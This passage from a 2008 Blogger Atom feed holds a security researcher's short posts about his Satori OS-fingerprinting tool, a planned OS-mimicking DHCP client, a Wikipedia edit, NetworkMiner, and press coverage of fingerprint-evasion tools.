other formats.  
Otherwise click on the Title up top and you should hit the pdf version of it.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-945484770423005021?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.x10security.org/appOSfingerprint.pdf' title='Advanced application level OS fingerprinting'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/945484770423005021/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=945484770423005021' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/945484770423005021'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/945484770423005021'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2008/11/advanced-applicationlevel-os.html' title='Advanced application level OS fingerprinting'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-8432949396114140039</id><published>2008-11-02T18:26:00.003-07:00</published><updated>2008-11-02T18:38:28.118-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='dhcp client'/><title type='text'>Future papers &amp; projects</title><content type='html'>After looking at what I had out there from my 2005 paper I realized there are a lot of things I've added to Satori that I really don't have documented well on how I did it.  
Since Satori and my papers are my way of giving back to the community, I'm going to try to go back and document each of the protocols I parse and use in Satori and do a quick whitepaper on each.  Nothing like the DHCP one, since that was written specifically for Blackhat 2007, but enough to help others who are trying to duplicate what I've done.&lt;br /&gt;&lt;br /&gt;Also, I've been thinking about writing my own DHCP client for Windows.  It goes along with the idea irongeek worked on about changing your TCP stack.  I have the initial plan in my head, but have not started coding it.  Not sure it will ever come to completion, but it will be fun to create a DHCP program to do DHCP Request, Inform, Discover, etc. packets while looking like it is a Linux 2.2 box, or a Windows 95 box, etc.  It will give me a chance to test some of the questions I had while writing the DHCP paper originally to see how well some DHCP servers adhere to things.&lt;br /&gt;&lt;br /&gt;First things first though, 2 new certs to work on; hopefully coding or writing of the whitepapers will start by Dec 1, but who knows.  
Still need to get back to some Satori work one of these days!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-8432949396114140039?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/8432949396114140039/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=8432949396114140039' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/8432949396114140039'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/8432949396114140039'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2008/11/future-papers-projects.html' title='Future papers &amp; projects'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-6198336342168582288</id><published>2008-11-02T18:23:00.004-07:00</published><updated>2008-11-02T18:33:16.469-07:00</updated><title type='text'>Wikipedia post</title><content type='html'>OK, not sure who originally updated the OS Fingerprinting post on Wikipedia and added Satori, but it wasn't me.  Glad to see NetworkMiner and Satori were added!&lt;br /&gt;&lt;br /&gt;Since it was already there, I fleshed out the Passive Fingerprinting stuff a bit more, putting links to my 2 papers on OS fingerprinting in general and to DHCP fingerprinting.  
I know, shameless, but I figured if that stuff was going to be mentioned it might as well have some decent reference material!&lt;br /&gt;&lt;br /&gt;Wikipedia post can be seen at:&lt;br /&gt;&lt;a href="http://en.wikipedia.org/wiki/OS_fingerprinting"&gt;http://en.wikipedia.org/wiki/OS_fingerprinting&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-6198336342168582288?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://en.wikipedia.org/wiki/OS_fingerprinting' title='Wikipedia post'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/6198336342168582288/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=6198336342168582288' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6198336342168582288'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6198336342168582288'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2008/11/wikipedia-post.html' title='Wikipedia post'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-8460097758624900579</id><published>2008-10-16T15:37:00.004-06:00</published><updated>2008-10-16T15:44:37.212-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='fingerprinting'/><category scheme='http://www.blogger.com/atom/ns#' term='networkminer'/><category 
scheme='http://www.blogger.com/atom/ns#' term='satori'/><category scheme='http://www.blogger.com/atom/ns#' term='driftnet'/><title type='text'>Network Miner</title><content type='html'>One program that is currently using parts of Satori is NetworkMiner, which is actually where most of the other news about Satori has been coming out from lately.&lt;br /&gt;&lt;br /&gt;NetworkMiner uses the DHCP fingerprinting DB in the currently released version at:&lt;br /&gt;&lt;a href="http://sourceforge.net/projects/networkminer/"&gt;http://sourceforge.net/projects/networkminer/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;I believe the next version that is released should also have the TCP fingerprinting piece from Satori, based on emails with the author in the past.&lt;br /&gt;&lt;br /&gt;Some good articles on NetworkMiner and what all it can do can be found here:&lt;br /&gt;&lt;a href="http://holisticinfosec.org/toolsmith/docs/august2008.pdf"&gt;http://holisticinfosec.org/toolsmith/docs/august2008.pdf&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.net-security.org/dl/insecure/INSECURE-Mag-18.pdf"&gt;http://www.net-security.org/dl/insecure/INSECURE-Mag-18.pdf&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;For the 2nd one you'll need to jump to page 18.&lt;br /&gt;&lt;br /&gt;NetworkMiner is a very nice program to pull information off the network and rebuild the files that are being downloaded.  Driftnet for Windows, along with a lot of other nice features.  Its OS identification is not nearly as polished as Satori's, in my opinion at least, but that is not what it is geared towards.  
&lt;br /&gt;&lt;br /&gt;Check it out&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-8460097758624900579?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/8460097758624900579/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=8460097758624900579' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/8460097758624900579'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/8460097758624900579'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2008/10/network-miner.html' title='Network Miner'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-937366574873135394</id><published>2008-10-16T15:10:00.003-06:00</published><updated>2008-11-02T18:37:42.603-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='os identification'/><category scheme='http://www.blogger.com/atom/ns#' term='tcp stack'/><category scheme='http://www.blogger.com/atom/ns#' term='osfuscate'/><category scheme='http://www.blogger.com/atom/ns#' term='satori'/><title type='text'>Satori in the news "out there"</title><content type='html'>The following sites/blogs have information on OS identification that mention Satori:&lt;br /&gt;One of the first references to it that I recall was by Thierry Zoller in a post on 
full disclosure, then later on his &lt;a href="http://secdev.zoller.lu"&gt;blog&lt;/a&gt;&lt;br /&gt;&lt;a href="http://snoopsec.blogspot.com/2008/10/obfuscating-your-os-tcp-stack-or-way-to.html"&gt;http://snoopsec.blogspot.com/2008/10/obfuscating-your-os-tcp-stack-or-way-to.html&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.binrev.com/forums/index.php?showtopic=39194&amp;amp;st=0&amp;amp;gopid=319785&amp;amp;#entry319785"&gt;http://www.binrev.com/forums/index.php?showtopic=39194&amp;amp;st=0&amp;amp;gopid=319785&amp;amp;#entry319785&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.irongeek.com/i.php?page=security/osfuscate-change-your-windows-os-tcp-ip-fingerprint-to-confuse-p0f-networkminer-ettercap-nmap-and-other-os-detection-tools"&gt;http://www.irongeek.com/i.php?page=security/osfuscate-change-your-windows-os-tcp-ip-fingerprint-to-confuse-p0f-networkminer-ettercap-nmap-and-other-os-detection-tools&lt;/a&gt;&lt;br /&gt;&lt;a href="http://hackaday.com/2008/10/04/avoiding-os-fingerprinting-in-windows/"&gt;http://hackaday.com/2008/10/04/avoiding-os-fingerprinting-in-windows/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The hackaday post came out on Oct 4, 2008; the hits to my website jumped from roughly 100 hits a month to about 350 in a 4-5 day period after that spot came out!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-937366574873135394?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/937366574873135394/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=937366574873135394' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/937366574873135394'/><link rel='self' 
type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/937366574873135394'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2008/10/satori-in-news-out-there.html' title='Satori in the news &quot;out there&quot;'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
